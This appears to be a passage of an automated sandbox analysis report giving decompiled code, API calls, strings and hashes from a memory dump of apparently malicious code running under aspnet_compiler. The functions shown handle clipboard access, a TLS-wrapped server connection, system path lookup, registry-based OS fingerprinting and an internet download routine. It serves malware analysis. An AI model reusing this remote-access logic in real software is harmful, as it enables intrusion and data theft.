                    										__eax = GlobalLock(__edi);
                    										__ecx =  &_v448;
                    										__esi = __eax;
                    										__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 0);
                    										__eax = E0040245C();
                    										__ecx =  &_v452;
                    										__ecx = E00401E45( &_v452, __edx, __ebp, __eflags, 0);
                    										GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
                    										goto L77;
                    									}
                    									goto L138;
                    								case 0x26:
                    									__eax = OpenClipboard(0);
                    									__eflags = __eax;
                    									if(__eax != 0) {
                    										__eax = EmptyClipboard();
                    										L77:
                    										__eax = CloseClipboard();
                    										goto L78;
                    									}
                    									goto L138;
                    								case 0x27:
                    									__ebx = 0;
                    									__ecx =  &_v444;
                    									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__eax = E0040245C();
                    									__ecx =  &_v448;
                    									__esi = __eax;
                    									__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 0);
                    									__eax = E00401F8B(__eax);
                    									__edx = __esi;
                    									__ecx = __eax;
                    									__eax = E00411235();
                    									goto L138;
                    								case 0x28:
                    									__eax =  &_v404;
                    									__ebx = 0;
                    									__ecx =  &_v444;
                    									_v404 = 0;
                    									_v408 = 0;
                    									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__eax = E00401F8B(__eax);
                    									__edx =  &_v412;
                    									__ecx = __eax;
                    									__eax = E0041A551(__eax, __edx,  &_v404);
                    									__eflags = __eax - 1;
                    									if(__eax == 1) {
                    										__edx = _v404;
                    										__ecx = _v408;
                    										E00411235() = L0043A61B(_v408);
                    									}
                    									goto L138;
                    								case 0x29:
                    									__eax = E0040B774(__ebx, __edx, __eflags);
                    									goto L138;
                    								case 0x2a:
                    									__ecx =  &_v444;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E00416B88(__ebx, __edx, __esi, __ebp);
                    									goto L100;
                    								case 0x2b:
                    									__ecx =  &_v444;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004137CC(__ebx, __edx, __esi, __ebp);
                    									goto L100;
                    								case 0x2c:
                    									__ecx =  &_v444;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E0040540F(__ebx, __edx, __esi, __ebp, __eflags);
                    									goto L100;
                    								case 0x2d:
                    									_push(__ecx);
                    									__esi = 0x473280;
                    									__ecx = 0x473280;
                    									__eax = E0040245C();
                    									__ecx = 0x473280;
                    									__eax = E00401F8B(0x473280);
                    									__ebx = 0;
                    									__ecx =  &_v444;
                    									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									E0040245C() = __eax + 1;
                    									__ecx =  &_v448;
                    									__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 0);
                    									__eax = E00401F8B(__eax);
                    									__ecx = 0x473238;
                    									__edx = E00401F8B(0x473238);
                    									__eax = E00412C2F(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
                    									goto L100;
                    								case 0x2e:
                    									__ecx =  &_v444;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004109E1(__ebx, __edx, __esi, __ebp, __eflags);
                    									goto L100;
                    								case 0x2f:
                    									__ecx =  &_v444;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E00418D73(__ebx, __edx);
                    									L100:
                    									goto L138;
                    							}
                    						}
                    					}
                    				}
                    				L141:
                    			}
                    0x00415779
                    0x0041577c
                    0x00415785
                    0x00415787
                    0x0041578d
                    0x00415792
                    0x00415792
                    0x00000000
                    0x00415792
                    0x0041574b
                    0x00415752
                    0x00415754
                    0x0041575a
                    0x0041575f
                    0x00000000
                    0x0041575f
                    0x0041571b
                    0x00415722
                    0x00415724
                    0x0041572a
                    0x00415795
                    0x00415795
                    0x00415797
                    0x00415797
                    0x00000000
                    0x00000000
                    0x0041589c
                    0x0041589d
                    0x004158a3
                    0x004158a5
                    0x004158b3
                    0x004158bd
                    0x004158c5
                    0x004158cb
                    0x004158d2
                    0x004158d6
                    0x004158da
                    0x004158df
                    0x004158e2
                    0x004158e6
                    0x004158e8
                    0x004158ed
                    0x004158ef
                    0x004158f4
                    0x00415c92
                    0x00415c92
                    0x00415c96
                    0x00415c96
                    0x00415c96
                    0x00000000
                    0x00000000
                    0x00415809
                    0x0041580b
                    0x00415811
                    0x00415818
                    0x00415821
                    0x00415823
                    0x00415828
                    0x00415837
                    0x0041583a
                    0x00415841
                    0x00415845
                    0x0041584c
                    0x0041584e
                    0x00415855
                    0x0041585e
                    0x00415879
                    0x00000000
                    0x00415879
                    0x00000000
                    0x00000000
                    0x00415882
                    0x00415888
                    0x0041588a
                    0x00415890
                    0x00415896
                    0x00415896
                    0x00000000
                    0x00415896
                    0x00000000
                    0x00000000
                    0x004158fe
                    0x00415900
                    0x0041590a
                    0x0041590c
                    0x00415912
                    0x00415916
                    0x0041591d
                    0x0041591f
                    0x00415924
                    0x00415926
                    0x00415928
                    0x00000000
                    0x00000000
                    0x00415932
                    0x00415936
                    0x0041593a
                    0x0041593e
                    0x00415942
                    0x0041594b
                    0x0041594d
                    0x00415952
                    0x00415956
                    0x00415958
                    0x0041595e
                    0x00415961
                    0x00415967
                    0x0041596b
                    0x00415978
                    0x0041597d
                    0x00000000
                    0x00000000
                    0x00415983
                    0x00000000
                    0x00000000
                    0x0041598f
                    0x00415993
                    0x00415998
                    0x0041599b
                    0x004159a3
                    0x00000000
                    0x00000000
                    0x004159af
                    0x004159b3
                    0x004159b8
                    0x004159bb
                    0x004159c3
                    0x00000000
                    0x00000000
                    0x004159cf
                    0x004159d3
                    0x004159d8
                    0x004159db
                    0x004159e3
                    0x00000000
                    0x00000000
                    0x004159ed
                    0x004159ee
                    0x004159f3
                    0x004159f5
                    0x004159fb
                    0x004159fd
                    0x00415a03
                    0x00415a05
                    0x00415a0f
                    0x00415a16
                    0x00415a17
                    0x00415a22
                    0x00415a24
                    0x00415a2f
                    0x00415a39
                    0x00415a3b
                    0x00000000
                    0x00000000
                    0x00415a47
                    0x00415a4b
                    0x00415a50
                    0x00415a53
                    0x00415a5b
                    0x00000000
                    0x00000000
                    0x00415a91
                    0x00415a95
                    0x00415a9a
                    0x00415a9d
                    0x00415aa5
                    0x00415bfa
                    0x00000000
                    0x00000000
                    0x00414eba
                    0x00414eb2
                    0x00414ea8
                    0x00000000

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountEventTick
                    • String ID: 82G$hlight$2G$4G$4G$Cqt
                    • API String ID: 180926312-2556873121
                    • Opcode ID: d62a8fa035ef45dc56afb164e10ed628e31e717e1bd2e0576287a8423718c946
                    • Instruction ID: 1006700840d6d5b1d4ae70cc5cb3dfe19242116085b8f2f801fb0bda7647f751
                    • Opcode Fuzzy Hash: d62a8fa035ef45dc56afb164e10ed628e31e717e1bd2e0576287a8423718c946
                    • Instruction Fuzzy Hash: FF0284316083015BC614FB76D857AEE72A8AF90308F50493FB942671E3EF7C9949C69B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1266 4048a8-4048c8 connect 1267 4049fb-4049ff 1266->1267 1268 4048ce-4048d1 1266->1268 1271 404a01-404a0f WSAGetLastError 1267->1271 1272 404a77 1267->1272 1269 4049f7-4049f9 1268->1269 1270 4048d7-4048da 1268->1270 1273 404a79-404a7e 1269->1273 1274 404906-404910 call 41f56b 1270->1274 1275 4048dc-404903 call 4052fe call 402073 call 41a04a 1270->1275 1271->1272 1276 404a11-404a14 1271->1276 1272->1273 1286 404921-40492e call 41f79a 1274->1286 1287 404912-40491c 1274->1287 1275->1274 1279 404a51-404a56 1276->1279 1280 404a16-404a1b call 41b45a 1276->1280 1283 404a5b-404a74 call 402073 * 2 call 41a04a 1279->1283 1285 404a20-404a4f call 4052dd call 402073 call 41a04a call 401fb8 1280->1285 1283->1272 1285->1272 1300 404930-404953 call 402073 * 2 call 41a04a 1286->1300 1301 404967-404972 call 42034b 1286->1301 1287->1283 1327 404956-404962 call 41f5ab 1300->1327 1312 4049a4-4049b1 call 41f711 1301->1312 1313 404974-4049a2 call 402073 * 2 call 41a04a call 41f9bd 1301->1313 1324 4049b3-4049d6 call 402073 * 2 call 41a04a 1312->1324 1325 4049d9-4049f4 CreateEventW * 2 1312->1325 1313->1327 1324->1325 1325->1269 1327->1272
                    C-Code - Quality: 72%
                    			E004048A8(void* __ecx, void* __esi) {
                    				char _v32;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				intOrPtr _t21;
                    				int _t22;
                    				void* _t26;
                    				signed int _t31;
                    				void* _t32;
                    				void* _t33;
                    				struct _SECURITY_ATTRIBUTES* _t34;
                    				void* _t43;
                    				void* _t51;
                    				struct _SECURITY_ATTRIBUTES* _t56;
                    				void* _t58;
                    				void* _t81;
                    				void* _t82;
                    				void* _t84;
                    				void* _t85;
                    				void* _t86;
                    				void* _t87;
                    				void* _t103;
                    				void* _t104;
                    
                    				_t84 = __esi;
                    				_t21 =  *0x470adc; // 0xedf140
                    				_t87 = _t86 - 0x1c;
                    				_t82 = __ecx;
                    				__imp__#4( *((intOrPtr*)(__ecx + 4)),  *((intOrPtr*)(_t21 + 0x18)),  *((intOrPtr*)(_t21 + 0x10)), _t81, _t51); // executed
                    				if(_t21 != 0) {
                    					__eflags =  *((char*)(__ecx + 0x31));
                    					if( *((char*)(__ecx + 0x31)) != 0) {
                    						__imp__#111();
                    						_t56 = _t21 - 0x2736;
                    						__eflags = _t56;
                    						if(_t56 != 0) {
                    							__eflags = _t56 == 0x17;
                    							if(_t56 == 0x17) {
                    								_t88 = _t87 - 0x18;
                    								_t58 = _t87 - 0x18;
                    								_push("Connection Refused");
                    								goto L20;
                    							} else {
                    								_t26 = E0041B45A( &_v32, _t21); // executed
                    								_t91 = _t87 - 0x18;
                    								E004052DD(_t51, _t87 - 0x18, "Connection Failed: ", _t85, __eflags, _t26);
                    								E00402073(_t51, _t91 - 0x14, "Connection Failed: ", _t85, "E");
                    								E0041A04A(_t51, _t82);
                    								E00401FB8();
                    							}
                    						}
                    					}
                    					goto L21;
                    				} else {
                    					if( *((intOrPtr*)(__ecx + 1)) == _t21) {
                    						L14:
                    						_t22 = 1;
                    					} else {
                    						if( *((intOrPtr*)(__ecx + 0x31)) != _t21) {
                    							_t103 = _t87 - 0x18;
                    							_t6 = _t82 + 0x34; // 0x472f14
                    							_t77 = "TLS Handshake...      | ";
                    							E004052FE(_t103, "TLS Handshake...      | ", _t85, _t6);
                    							_t104 = _t103 - 0x14;
                    							E00402073(_t51, _t104, "TLS Handshake...      | ", _t85, "i");
                    							E0041A04A(_t51, _t82);
                    							_t87 = _t104 + 0x30;
                    						}
                    						_t31 = E0041F56B(_t51);
                    						 *(_t82 + 0x4c) = _t31;
                    						if(_t31 != 0) {
                    							_t80 =  *((intOrPtr*)(_t82 + 4));
                    							_t32 = E0041F79A(_t31,  *((intOrPtr*)(_t82 + 4)));
                    							__eflags = _t32 - 1;
                    							if(_t32 == 1) {
                    								_t33 = E0042034B();
                    								__eflags = _t33 - 1;
                    								if(_t33 == 1) {
                    									_t34 = E0041F711(_t51);
                    									 *((intOrPtr*)(_t82 + 0x50)) = _t34;
                    									__eflags = _t34;
                    									if(_t34 == 0) {
                    										_t94 = _t87 - 0x18;
                    										E00402073(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 3");
                    										E00402073(_t51, _t94 - 0x18, _t80, _t85, "E");
                    										E0041A04A(_t51, _t82);
                    									}
                    									__eflags = 0;
                    									 *((intOrPtr*)(_t82 + 0x70)) = CreateEventW(0, 0, 1, 0);
                    									 *((intOrPtr*)(_t82 + 0x6c)) = CreateEventW(0, 0, 1, 0);
                    									goto L14;
                    								} else {
                    									_t97 = _t87 - 0x18;
                    									E00402073(_t51, _t87 - 0x18, _t80, _t85, "TLS Authentication Failed");
                    									E00402073(_t51, _t97 - 0x18, _t80, _t85, "E");
                    									_t43 = E0041F9BD(E0041A04A(_t51, _t82),  *(_t82 + 0x4c));
                    									goto L8;
                    								}
                    							} else {
                    								_t100 = _t87 - 0x18;
                    								E00402073(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 2");
                    								E00402073(_t51, _t100 - 0x18, _t80, _t85, "E");
                    								_t43 = E0041A04A(_t51, _t82);
                    								L8:
                    								E0041F5AB(_t43, _t51,  *(_t82 + 0x4c), _t80, _t82, _t84);
                    								 *(_t82 + 0x4c) =  *(_t82 + 0x4c) & 0x00000000;
                    								goto L21;
                    							}
                    						} else {
                    							_t88 = _t87 - 0x18;
                    							_t58 = _t87 - 0x18;
                    							_push("TLS Error 1");
                    							L20:
                    							E00402073(_t51, _t58, _t77, _t85);
                    							E00402073(_t51, _t88 - 0x18, _t77, _t85, "E");
                    							E0041A04A(_t51, _t82);
                    							L21:
                    							_t22 = 0;
                    						}
                    					}
                    				}
                    				return _t22;
                    			}

                    APIs
                    • connect.WS2_32(?,?,?), ref: 004048C0
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                    • WSAGetLastError.WS2_32 ref: 00404A01
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                    • API String ID: 994465650-2151626615
                    • Opcode ID: 13303b7777a66e0627b8120b2b748ce865bb03d248de62a457749d618faae74e
                    • Instruction ID: 4dac077a67aca900205559ee8606d27a3048533bf49cbaad300c4d8012786ffc
                    • Opcode Fuzzy Hash: 13303b7777a66e0627b8120b2b748ce865bb03d248de62a457749d618faae74e
                    • Instruction Fuzzy Hash: 5641C5B1F4020177D6047B7A890B96E7A25AB81304B50017FF901226D3EE7DA96587EF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E00404E06(void* __edx) {
                    				void* __ebx;
                    				void* __ecx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				long _t29;
                    				int _t32;
                    				void* _t44;
                    				void* _t48;
                    				void* _t50;
                    				void* _t51;
                    
                    				_t48 = __edx;
                    				_t51 = WaitForSingleObject;
                    				_t50 = _t44;
                    				_t29 = WaitForSingleObject( *(_t50 + 0x68), 0xffffffff);
                    				if( *(_t50 + 4) != 0xffffffff) {
                    					__imp__#3( *(_t50 + 4)); // executed
                    					if(_t29 == 0) {
                    						 *(_t50 + 4) =  *(_t50 + 4) | 0xffffffff;
                    					}
                    					_t45 = _t50;
                    					if(E004046D3(_t50) != 0) {
                    						E004050C4(_t45, _t51, 1);
                    					}
                    					if( *((char*)(_t50 + 1)) != 0) {
                    						E0041F5AB(WaitForSingleObject( *(_t50 + 0x70), 0xffffffff), CloseHandle,  *(_t50 + 0x50), _t48, SetEvent, _t50);
                    						 *(_t50 + 0x50) =  *(_t50 + 0x50) & 0x00000000;
                    						SetEvent( *(_t50 + 0x70));
                    						E0041F5AB(WaitForSingleObject( *(_t50 + 0x6c), 0xffffffff), CloseHandle,  *(_t50 + 0x4c), _t48, SetEvent, _t50);
                    						 *(_t50 + 0x4c) =  *(_t50 + 0x4c) & 0x00000000;
                    						SetEvent( *(_t50 + 0x6c));
                    						FindCloseChangeNotification( *(_t50 + 0x70)); // executed
                    						FindCloseChangeNotification( *(_t50 + 0x6c)); // executed
                    						 *(_t50 + 0x70) =  *(_t50 + 0x70) & 0x00000000;
                    						 *(_t50 + 0x6c) =  *(_t50 + 0x6c) & 0x00000000;
                    					}
                    					SetEvent( *(_t50 + 0x68));
                    					_t32 = CloseHandle( *(_t50 + 0x68));
                    				} else {
                    					SetEvent( *(_t50 + 0x68));
                    					_t32 = CloseHandle( *(_t50 + 0x68));
                    				}
                    				 *(_t50 + 0x68) =  *(_t50 + 0x68) & 0x00000000;
                    				return _t32;
                    			}

                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                    • closesocket.WS2_32(000000FF), ref: 00404E3A
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E71
                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404E82
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E89
                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9A
                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9F
                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EA4
                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB1
                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB6
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEvent$ObjectSingleWait$ChangeFindHandleNotification$closesocket
                    • String ID:
                    • API String ID: 4074944092-0
                    • Opcode ID: c35fc44e5bfacc15a099201c4a6197d0eccb1db68525e6f951916da880a66cf1
                    • Instruction ID: 36cdbf8d69702b382ce25e6a3e5e0fa9723ae9905729ab2d5c1a42a88e4aa4cf
                    • Opcode Fuzzy Hash: c35fc44e5bfacc15a099201c4a6197d0eccb1db68525e6f951916da880a66cf1
                    • Instruction Fuzzy Hash: D6211A71044B00AFD7216B26DC49A1BBBA6FF40326F104A3DE1A611AF1CB75A851DB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1358 40cf38-40cf5d call 401f66 1361 40cf63 1358->1361 1362 40d087-40d0ad call 401ee4 GetLongPathNameW call 40415e 1358->1362 1363 40d072 1361->1363 1364 40d063-40d068 call 43a99f 1361->1364 1365 40cf74-40cf82 call 41a10f call 401ef3 1361->1365 1366 40cf95-40cf9a 1361->1366 1367 40d055-40d05a 1361->1367 1368 40cfa9-40cfb0 call 41ab12 1361->1368 1369 40cf6a-40cf6f 1361->1369 1370 40d05c-40d061 1361->1370 1371 40cf9f-40cfa4 1361->1371 1388 40d0b2-40d11f call 40415e call 40d2d5 call 402f85 * 2 call 401ee9 * 5 1362->1388 1374 40d077-40d07c call 43a99f 1363->1374 1379 40d06d-40d070 1364->1379 1392 40cf87 1365->1392 1366->1374 1367->1374 1383 40cfb2-40d002 call 40415e call 43a99f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1368->1383 1384 40d004-40d050 call 40415e call 43a99f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1368->1384 1369->1374 1370->1374 1371->1374 1385 40d07d-40d082 call 4086cb 1374->1385 1379->1363 1379->1385 1397 40cf8b-40cf90 call 401ee9 1383->1397 1384->1392 1385->1362 1392->1397 1397->1362
                    C-Code - Quality: 86%
                    			E0040CF38(void* __ecx, void* __edx, intOrPtr _a4) {
                    				char _v524;
                    				char _v544;
                    				char _v560;
                    				char _v572;
                    				void* _v576;
                    				char _v580;
                    				char _v584;
                    				char _v600;
                    				char _v608;
                    				char _v616;
                    				char _v620;
                    				void* _v624;
                    				char _v628;
                    				char _v632;
                    				char _v636;
                    				char _v644;
                    				void* _v648;
                    				char _v652;
                    				void* _v672;
                    				void* __ebx;
                    				void* __ebp;
                    				signed int _t36;
                    				void* _t39;
                    				void* _t40;
                    				void* _t77;
                    				void* _t82;
                    
                    				_t73 = __edx;
                    				_t77 = __ecx;
                    				_t54 = __edx;
                    				E00401F66(__edx,  &_v644);
                    				_t36 = __edx + 0xffffffd0;
                    				_t86 = _t36 - 8;
                    				if(_t36 <= 8) {
                    					switch( *((intOrPtr*)(_t36 * 4 +  &M0040D120))) {
                    						case 0:
                    							_push(L"Temp");
                    							goto L15;
                    						case 1:
                    							__ecx =  &_v620;
                    							__eax = E0041A10F(__ebx,  &_v620, __edx);
                    							__ecx =  &_v644;
                    							__eax = E00401EF3( &_v644, __edx, __esi, __eax);
                    							goto L4;
                    						case 2:
                    							_push(L"SystemDrive");
                    							goto L15;
                    						case 3:
                    							_push(L"WinDir");
                    							goto L15;
                    						case 4:
                    							__eax = E0041AB12(__ecx);
                    							__eflags = __al;
                    							if(__eflags != 0) {
                    								__ecx =  &_v620;
                    								E0040415E(__ebx, __ecx, __edx, __ebp, L"\\SysWOW64") = E0043A99F(__ebx, __ecx, __eflags, L"WinDir");
                    								__ecx =  &_v600;
                    								__edx = __eax;
                    								__ecx =  &_v580;
                    								__eax = E00402F85( &_v580, __edx, __eax);
                    								__ecx =  &_v652;
                    								__eax = E00401EF3( &_v652, __edx, __esi, __eax);
                    								__ecx =  &_v584;
                    								__eax = E00401EE9();
                    								__ecx =  &_v608;
                    								__eax = E00401EE9();
                    								L4:
                    								__ecx =  &_v620;
                    								goto L5;
                    							} else {
                    								__ecx =  &_v572;
                    								E0040415E(__ebx, __ecx, __edx, __ebp, L"\\system32") = E0043A99F(__ebx, __ecx, __eflags, L"WinDir");
                    								__ecx =  &_v600;
                    								__edx = __eax;
                    								__ecx =  &_v628;
                    								__eax = E00402F85( &_v628, __edx, __eax);
                    								__ecx =  &_v652;
                    								__eax = E00401EF3( &_v652, __edx, __esi, __eax);
                    								__ecx =  &_v632;
                    								__eax = E00401EE9();
                    								__ecx =  &_v608;
                    								__eax = E00401EE9();
                    								__ecx =  &_v584;
                    								L5:
                    								__eax = E00401EE9();
                    								goto L17;
                    							}
                    							L18:
                    						case 5:
                    							L14:
                    							_push(L"ProgramFiles");
                    							goto L15;
                    						case 6:
                    							_push(L"AppData");
                    							goto L15;
                    						case 7:
                    							_push(L"UserProfile");
                    							L15:
                    							_t51 = E0043A99F(_t54, _t57, _t86);
                    							goto L16;
                    						case 8:
                    							__eax = E0043A99F(__ebx, __ecx, __eflags, L"ProgramData"); // executed
                    							__eflags = __eax;
                    							if(__eflags == 0) {
                    								goto L14;
                    							}
                    							L16:
                    							L004086CB(_t54,  &_v644, _t73, _t51);
                    							goto L17;
                    					}
                    				}
                    				L17:
                    				__imp__GetLongPathNameW(E00401EE4( &_v644),  &_v524, 0x208); // executed
                    				_t39 = E0040415E(_t54,  &_v560, _t73, _t82, _a4);
                    				_t40 = E0040415E(_t54,  &_v636, _t73, _t82, "\\");
                    				E00402F85(_t77, E00402F85( &_v600, E0040D2D5(_t54,  &_v616, _t73, _t82, _t86,  &_v544, _t38), _t40), _t39);
                    				E00401EE9();
                    				E00401EE9();
                    				E00401EE9();
                    				E00401EE9();
                    				E00401EE9();
                    				return _t77;
                    				goto L18;
                    			}






























                    APIs
                    • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040D09E
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LongNamePath
                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                    • API String ID: 82841172-425784914
                    • Opcode ID: 1c40dfc39a49de24788d75347d487970fcdc56dabf44de8dd18c5321d483f06d
                    • Instruction ID: 6b614a152261b5ac042ce2f1e9ed8ca0f13a8186c1863ac34b2aa9a3c23cc976
                    • Opcode Fuzzy Hash: 1c40dfc39a49de24788d75347d487970fcdc56dabf44de8dd18c5321d483f06d
                    • Instruction Fuzzy Hash: A24155715082009AC204F761D852DAFB3E8AE9075CF10053FF586760E2EE789A4AC65F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1487 419e1e-419e75 call 41ab12 call 41288e call 401fc2 call 401fb8 call 406155 1498 419e77-419e86 call 41288e 1487->1498 1499 419eb8-419ec1 1487->1499 1504 419e8b-419ea2 call 401f8b StrToIntA 1498->1504 1500 419ec3-419ec8 1499->1500 1501 419eca 1499->1501 1503 419ecf-419eda call 40535d 1500->1503 1501->1503 1509 419eb0-419eb3 call 401fb8 1504->1509 1510 419ea4-419ead call 41b874 1504->1510 1509->1499 1510->1509
                    C-Code - Quality: 74%
                    			E00419E1E(void* __ecx, void* __eflags) {
                    				char _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				char _t7;
                    				void* _t8;
                    				int _t15;
                    				void* _t25;
                    				void* _t31;
                    				void* _t32;
                    				void* _t33;
                    
                    				_t7 = E0041AB12(__ecx);
                    				_push(__ecx);
                    				_t19 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
                    				 *0x472ae4 = _t7;
                    				_t29 = 0x80000002;
                    				_t8 = E0041288E( &_v28, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
                    				E00401FC2(0x473950, 0x80000002, _t31, _t8);
                    				E00401FB8();
                    				_t32 = E00406155(0x473950, "10", 0);
                    				if(_t32 != 0xffffffff) {
                    					_push(0x473950);
                    					_t29 = 0x80000002;
                    					E0041288E( &_v28, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "CurrentBuildNumber"); // executed
                    					_t15 = StrToIntA(E00401F8B( &_v28));
                    					_t39 = _t15 - 0x55f0;
                    					if(_t15 >= 0x55f0) {
                    						_t5 = _t32 + 1; // 0x1
                    						 *((char*)(E0041B874(0x80000002, _t33, _t39, _t5))) = 0x31;
                    					}
                    					E00401FB8();
                    				}
                    				_t25 = 0x473950;
                    				if( *0x472ae4 == 0) {
                    					_push(" (32 bit)");
                    				} else {
                    					_push(" (64 bit)");
                    				}
                    				return L0040535D(_t19, _t25, _t29, 0x473950, _t33);
                    			}
















                    APIs
                      • Part of subcall function 0041AB12: GetCurrentProcess.KERNEL32(?,?,?,0040CFAE,WinDir,00000000,00000000), ref: 0041AB23
                      • Part of subcall function 0041288E: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004128B2
                      • Part of subcall function 0041288E: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004128CF
                      • Part of subcall function 0041288E: RegCloseKey.KERNELBASE(?), ref: 004128DA
                    • StrToIntA.SHLWAPI(00000000,0046A9AC,00000000,00000000,00000000,00473298,00000003,Exe,00000000,0000000E,00000000,0046408C,00000003,00000000), ref: 00419E97
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCurrentOpenProcessQueryValue
                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$P9G$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                    • API String ID: 1866151309-2787534724
                    • Opcode ID: 5743bde162c7f15c4a6a80105cc2fc1329e71675b8daac915826904b96160fdf
                    • Instruction ID: 2d8a69e0546d05ecafa38ff55f4d44f4812dfb7c18b39c611b81bdfdf30cbcec
                    • Opcode Fuzzy Hash: 5743bde162c7f15c4a6a80105cc2fc1329e71675b8daac915826904b96160fdf
                    • Instruction Fuzzy Hash: C311E370A4020116C704B3659C5BEEF7A1D8790305F64053FF906B61D2EB7C1C9686AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1514 419edb-419f1e call 4020bf call 43a620 InternetOpenW InternetOpenUrlW 1519 419f20-419f41 InternetReadFile 1514->1519 1520 419f43-419f63 call 402097 call 403356 call 401fb8 1519->1520 1521 419f67-419f6a 1519->1521 1520->1521 1522 419f70-419f7d InternetCloseHandle * 2 call 43a61b 1521->1522 1523 419f6c-419f6e 1521->1523 1527 419f82-419f8c 1522->1527 1523->1519 1523->1522
                    C-Code - Quality: 90%
